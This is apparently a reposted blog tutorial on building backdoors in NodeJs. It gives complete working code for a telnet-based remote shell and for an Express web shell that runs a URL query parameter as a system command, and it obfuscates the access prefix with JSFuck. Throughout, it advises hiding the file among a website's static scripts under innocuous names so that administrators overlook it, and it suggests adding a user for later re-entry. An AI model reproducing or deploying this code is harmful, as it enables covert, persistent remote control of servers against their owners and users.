NodeJs backdoor program

Source: Internet
Author: User
Tags: server, website


0x00 Preface

Let's pick a language and write a kind of backdoor program that, as far as I know, does not yet exist in the wild.

0x01 Why NodeJs?

I personally love the JavaScript language, and what we are talking about today is NodeJs, a server-side runtime for JavaScript. NodeJs comes with its own web server and doubles as a back-end language. This matters because a single NodeJs download is enough to complete the whole series of operations, which saves a lot of trouble. Even if the O&M staff discover it, the assumption will be that the development department is working on some NodeJs project.

NodeJs is still young and many people have never learned it. I have met O&M staff who understand PHP and Python, but never one who knew NodeJs.

In the following sections I will write the NodeJs backdoor in two variants: telnet communication and web communication.


0x02 preparations

For installing NodeJs, search Baidu.

The node.js version used here is 5.1.0.

After NodeJs is installed, we can create a NodeJs file in any directory. I recommend putting it in the JavaScript directory under the website's static directory: since it is a JavaScript file, it blends in well there. To keep things simple here, I create a nodeDemo directory and put the NodeJs file in it.

I am creating app.js here. Of course, you can name it base.js, cache.js, cookies.js and so on, purely to hide it.

0x03 telnet communication Backdoor

For telnet-style communication in NodeJs we need the net library and the exec method from the child_process library.

The Code is as follows:

var net = require('net');
var exec = require('child_process').exec;

Use the createServer() function to create the server; its callback is invoked once per incoming connection:

var server = net.createServer(function(conn){
    //code
});

Next we need to set the string encoding. Without it, each data event delivers a Buffer rather than a string, so the replace call used below would fail and non-ASCII output would show up garbled:

conn.setEncoding('utf8');

Written here as 'utf8' without a hyphen; Node also accepts 'utf-8' as an alias, so either spelling works.

To make it look nicer I also added conn.write('\n'); the output then starts on a fresh line.

OK. Once a connection is established, the input string is handled in the data event, registered with the on function:

conn.on('data', function(data){
    //code
});

Strip the line terminator from the input:

data = data.replace('\r\n', '');

This line is very important; I got stuck on it for 20 minutes. When you press Enter, telnet sends a carriage return and line feed ('\r\n') after what you typed. Neither character is visible, but both are part of the string, so without this step the shell receives 'ls\r' and reports that the command does not exist. Note that replace with a string argument removes only the first occurrence, and that a telnet client in character mode can deliver one line across several data events; the code works for one command typed per line and nothing more.

The data variable now holds the command we typed. Next we use the exec method of the child_process library:

exec(data, function(error, stdout){
    //code
});

The first parameter of exec is the command string, which is run through the system shell (/bin/sh -c on Linux, cmd.exe on Windows). The second parameter is a callback: its first argument, error, is set when the command could not be started or exited with a non-zero status; its second argument, stdout, is what the command printed. A third argument, stderr, is ignored here, so error output from a command that exits successfully is never shown.

First, check whether the command produced an error:

if(error !== null){
    conn.write(error + '\n');
    return false;
}

If there is no error, error is null, and that is the condition we test. conn.write sends text back to the telnet terminal, much like echo in PHP.

return false; stops the callback from continuing.

The following shows the command feedback:

conn.write('########################start\n\n' + stdout + '\n########################end\n\n');

To be more intuitive, I use # start and # end to mark the feedback area.

With the server object set up, run it and listen on a port:

server.listen(3000, function(){
    console.log('OK');
});

This listens on port 3000 (on all interfaces, since no address is given) and prints OK in the terminal.

The complete code is as follows:

var net = require('net');
var exec = require('child_process').exec;

var server = net.createServer(function(conn){
    conn.setEncoding('utf8');          // deliver strings, not Buffers
    conn.write('\n');                  // cosmetic blank line for the telnet client
    conn.on('data', function(data){
        data = data.replace('\r\n', '');   // strip the line terminator telnet appends
        exec(data, function(error, stdout){
            if(error !== null){
                conn.write(error + '\n');
                return false;
            }
            conn.write('########################start\n\n' + stdout + '\n########################end\n\n');
        });
    });
});

server.listen(3000, function(){
    console.log('OK');
});

Now let's test.

Open another terminal and enter telnet 127.0.0.1 3000

Run a few commands (the session is shown as a screenshot in the original post).

OK. Now all that is left is to add a user so you can get back onto the machine.

One flaw here: there is no password check. I looked through the functions of the net library for something like password verification and found nothing, so I came up with a substitute:

if(data.substring(0,2) == 'js'){
    data = data.substring(2);
}else{
    return false;
}

Each command must be prefixed with js; without it, nothing is output. Example:

The first time I typed ls, nothing ran; the command succeeded only once the js prefix was added. Bear in mind that this is a two-character static prefix compared with ==, not authentication: it is sent in cleartext, and anyone who can reach port 3000 (the server binds every interface) can brute-force it in a few thousand attempts. It keeps casual port scanners from seeing a shell, nothing more.

Writing the js string in the clear is too conspicuous, so let's obfuscate it. Because node.js uses the V8 engine, the JavaScript black magic used in browsers also works in node.js. We can encode js with JSFuck at http://www.jsfuck.com/; the resulting expression is the one below. Note that this is obfuscation, not encryption: the expression evaluates back to the plain string, and the prefix typed over the wire is still the literal js. It only hides the constant from someone reading the file.

(+(!+[]+!+[]+!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]

Now the NodeJs backdoor code is the same as above with this expression in place of the 'js' literal in the comparison (the original post shows the result as a screenshot).

Testing again (screenshot not reproduced): it still works. Perfect.

0x04 Web communication backdoor

In the previous section, telnet communication is used as a backdoor. Now let's talk about web communication backdoors.

The Express framework is used here. Anyone who has played with NodeJs knows that it is basically the standard web framework for NodeJs.

Install the Express framework (and its project generator) on your own.

First, create a website directory to hold the program, using the express generator:

express node

cd node && npm install

Once that finishes, go into the routes directory and modify index.js:

vim routes/index.js

This is the index.js that the generator produced (shown as a screenshot in the original post; it is the express-generator default, which requires express, creates a Router, registers a GET handler for '/' that renders the index view, and exports the router). Now let's modify it.

Add the following at line 3:

var exec = require('child_process').exec;

Delete line 6 (the res.render call inside the handler) and put this in its place:

exec(req.query.webshellPassword, function(error, stdout){
    if(error !== null){
        res.send(error);
        return false;
    }
    res.send(stdout);
});

It is basically the same as the telnet backdoor in the previous section. The piece that is new is:

req.query.webshellPassword

req.query is how Express exposes the URL query parameters, and webshellPassword is the parameter name; it is the equivalent of $_GET['webshellPassword'] in PHP. Note that knowing the parameter name is the only thing standing between the network and the shell here, and that the generated app logs every request line with morgan, so each command also ends up in the server log.

The complete code is the generated index.js with the two changes above (the original post shows it as a screenshot).

Now go to the node directory and start the app (screenshot not reproduced).

Open a browser and enter http://127.0.0.1:3000/?webshellPassword=ls

The result is shown as a screenshot in the original post.

If the host is Windows without a Linux command set installed, use dir instead of ls.

Let's take a rough look at what we can do (screenshot not reproduced):

Everything you want can be done, and your mood instantly improves.

The next chapter describes how to manage these backdoors through a website, so you no longer have to carry a computer around every day.


The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.
